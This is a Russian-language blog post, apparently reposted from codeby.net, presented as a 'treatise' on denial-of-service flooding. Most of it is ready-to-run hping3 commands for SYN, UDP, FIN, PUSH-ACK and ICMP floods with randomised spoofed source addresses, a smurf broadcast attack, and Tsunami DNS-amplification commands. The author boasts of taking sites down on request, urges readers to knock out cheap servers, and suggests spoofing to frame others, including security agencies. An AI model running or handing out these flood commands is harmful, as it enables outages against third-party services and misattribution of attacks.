трактат о DoS-e | dos - flood attack

трактат о DoS-e | dos - flood attack

@webware

t.me/webware

Cтатья является ознакомительной!)) чего то захотелось мне такое написать! 

Всем привет, решил я поделится с Вами этими методиками и инструментами ибо, зае..ли эти китайские услуги, СОДА ,Малышева, глисты для похудения и всякого рода ..уета)) Те люди у которых не установлен (или лень его натянуть на браузер) adblock, они меня поймут и часто еще обращаются с просьбами положить сайты с педофилией(в луковице как правило) что я с успехом и делаю, где и Вам рекомендую оттачивать это "не легкое" ремесло..))

И так что же что такое DOS атака подробно Вы узнаете здесь от меня в двух словах DOS - это когда она ведется от одной машины то есть один на один DDOS - это когда от 2-ух и более типо >BotNet Дедок, привет!))

И так начнем с классики с утилиты которая меня в свое время очень поразила своим функционалом (не скажу каким) смысл этой атаки есть таков, что можно подставить любого человека или сами знаете какую силовую организацию в том что он(они) нападали на другую более серьезную организацию)) в общем веселая программа hping3 которая с успехом проводит SYN-флуд на TCP -протокол соединения, а он как Вы знаете<-(наверное) обладает трехсторонним рукопожатием.

hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE

UDP-флуд

hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP

Ну и старички помнят легенду, которая также проводит такие же атаки : TCP, UDP, HTTP.

скачать

TCP_FIN-флуд это если атакующий только атакует сервер без TCP-соединения, пакет FIN будет отброшен, но сервер все равно будет выделять некоторые ресурсы для просмотра пакета, чтобы предотвратить избыточность и в скором времени он ляжет

hping3 --flood --rand-source -F -p TARGET_PORT TARGET_IP

PUSH _ACK-флуд это если сервер раздразнить этим флудом, он может обидеться и ваще перестать всех обслуживать)

hping3 --flood --rand-source -PA -p TARGET_PORT TARGET_IP

ICMP_IGMP-флуд это мало эффективная атака нужно проводить долго и не одному но все же укажу её, так это же трактат)

hping3 --flood --rand-source -1 -p TARGET_PORT TARGET_IP

SMURF-флуд это Злоумышленник выберет некоторые промежуточные сайты в качестве усилителей, а затем отправит огромное количество запросов ICMP (ping) на эти промежуточные сайты для широковещательного IP-адреса. Таким образом, все исходные IP-адреса изменяются на целевые IP-адреса, которые передают эти пакеты хостам всех подсетей. Наконец, все ответы хоста отправляются обратно в цель.

hping3 --icmp --spoof TARGET_IP BROADCAST_IP

С это утилитой пожалуй все, но представлю Вам еще один инструмент:

Tsunami - DNS Amplification Attack Tool - Он предназначен для исследования и тестирования ваших брандмауэров, а также IDS / IPS. Не думайте об использовании этого инструмента для атаки. Это очень дорого из-за низкой производительности. Эффект может отличаться в зависимости от ширины полосы, количества сеансов и размера обратной связи от запроса домена, а также от мощности инструмента. <<<-- это перевод от официального сайта , но поверьте эта прожка достойна внимания!))

./tsunami -o recursive_dns.txt -l 4 -e 172.0.0.0/8
./tsunami -s TARGET_IP -n pentest.blog -p 3 -f recursive_dns.txt

и на последок, как же без плюшек от меня!? Все есть! И дополню что таких инструментов полно в дистрибутиве BlackArch 46 как видите.) на любой вкус и цвет.

DAVOSET

Напутствие: "Применяйте такого рода атаки в благородных целях!" так как нормальный сервак Вам одному положить не удастся, а вот какой нить слабенький за пару долларов в месяц или вообще free, легко на которых как правило размещен всякого рода трэш и отчаянные попытки нажиться на простых людях.. в общем Вы меня надеюсь услышали!)
Удачи!

Источник codeby.net